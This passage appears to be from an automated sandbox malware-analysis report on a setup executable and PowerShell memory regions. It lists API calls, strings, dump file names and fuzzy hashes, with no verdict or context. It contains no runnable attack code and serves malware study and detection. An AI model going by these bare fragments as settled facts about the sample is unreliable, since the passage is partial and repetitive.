                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1599320355-0
                                                                                                                                                    • Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                                                                                    • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                    • Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                                                                                    • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                    • String ID: Version
                                                                                                                                                    • API String ID: 512980652-315105994
                                                                                                                                                    • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                    • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                    • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                    • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                                    • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                    • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                    • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                    • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2883127279-0
                                                                                                                                                    • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                    • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                    • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                    • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                      • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                    • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                    • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                    • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                    • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                    • String ID: !N~
                                                                                                                                                    • API String ID: 623250636-529124213
                                                                                                                                                    • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                    • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                    • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                    • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                    Strings
                                                                                                                                                    • Error launching installer, xrefs: 00405C74
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                                    • String ID: Error launching installer
                                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                                    • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                    • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                    • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                    • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                      • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                    • API String ID: 3509786178-2769509956
                                                                                                                                                    • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                    • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                    • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                    • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                    • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                    • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                    • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                    • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                    • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                                    • API String ID: 0-2551064546
                                                                                                                                                    • Opcode ID: 483b1b227ce8a8c2a1f5920ac614394fac59388f648ca92a94f0756a8c8f1909
                                                                                                                                                    • Instruction ID: 0690445d9e59a5adf28a45787986e35ee1da46d0d5df48f3f55814090b16cff8
                                                                                                                                                    • Opcode Fuzzy Hash: 483b1b227ce8a8c2a1f5920ac614394fac59388f648ca92a94f0756a8c8f1909
                                                                                                                                                    • Instruction Fuzzy Hash: BF4258B1B0431A8FC7258B69D8107AABBF6AFC6310F1584AAD516CF352DB31CD45C7A1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2072455742.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_52b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ac4cb49c2bbb13cb7970af0bf6fafb8d591c058d91828b1f9ad1bb5b30bb76b6
                                                                                                                                                    • Instruction ID: 9f06d2340fc22b517b264614aa43a5a8eebd8da252c4b02b46c8ba478cb5f6d3
                                                                                                                                                    • Opcode Fuzzy Hash: ac4cb49c2bbb13cb7970af0bf6fafb8d591c058d91828b1f9ad1bb5b30bb76b6
                                                                                                                                                    • Instruction Fuzzy Hash: 8F122874A10219DFDB14DF98C584AAEFBB2FF88350F258559E809AB365C771EC81CB90
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2072455742.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_52b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 71a2df1cf1f60dd19ce90cc1b8a6f36e85b01a96a44e478149c704ea003dc371
                                                                                                                                                    • Instruction ID: 16bd6086111c2a5d1a5187e104437b25e0ab85bb54c3bf5d396c4fdf1c89ddcd
                                                                                                                                                    • Opcode Fuzzy Hash: 71a2df1cf1f60dd19ce90cc1b8a6f36e85b01a96a44e478149c704ea003dc371
                                                                                                                                                    • Instruction Fuzzy Hash: 8C227A74A142499FDB05CFA8C484AEEFBB2FF88350F248559E805AB365C771ED81CB90
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2076093867.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_7ad0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8c295b10acf3f387145d4b6103b461fdc5675b6fdca1abc1b7e28e4899a246c5
                                                                                                                                                    • Instruction ID: a32ff6bac729ac7d7216317541defcb46d8bb7ee065a6bf93b1426fd8050bc09
                                                                                                                                                    • Opcode Fuzzy Hash: 8c295b10acf3f387145d4b6103b461fdc5675b6fdca1abc1b7e28e4899a246c5
                                                                                                                                                    • Instruction Fuzzy Hash: 704116F1A0020ADBCB248FA5C541B6677F6AFC1350F168095D9168F652EB35DD41CBA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2072455742.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_52b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 94f24b8d5c5ca2223a6474a5d9b7fff802b32e973016c7cb4f181442b6d7c16e
                                                                                                                                                    • Instruction ID: 887ce455cf0b05a3faaedf62decff0cb93a818657c61fa1cba9b942ac557056b
                                                                                                                                                    • Opcode Fuzzy Hash: 94f24b8d5c5ca2223a6474a5d9b7fff802b32e973016c7cb4f181442b6d7c16e
                                                                                                                                                    • Instruction Fuzzy Hash: D84134B4A001459FDB0ACF58C194EAEFBB1FF48350B2585A9D806AB365C736FD51CBA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000011.00000002.2072455742.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_17_2_52b0000_powershell.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3c56ae8a848a8ed0a9f129d753623c12aa5a326e9dfe46a2d60597a391cf814e
                                                                                                                                                    • Instruction ID: 0241724f81c94a30bbcdb5b6f98fd9a98e6137a03339ef9bf39783427b935b4b
                                                                                                                                                    • Opcode Fuzzy Hash: 3c56ae8a848a8ed0a9f129d753623c12aa5a326e9dfe46a2d60597a391cf814e
                                                                                                                                                    • Instruction Fuzzy Hash: FD317EB4A093958FCB02DF6CD8A099ABFB0BF4A210B0540D6D494DB363D625EC49CBA1
                                                                                                                                                    Memory Dump Source
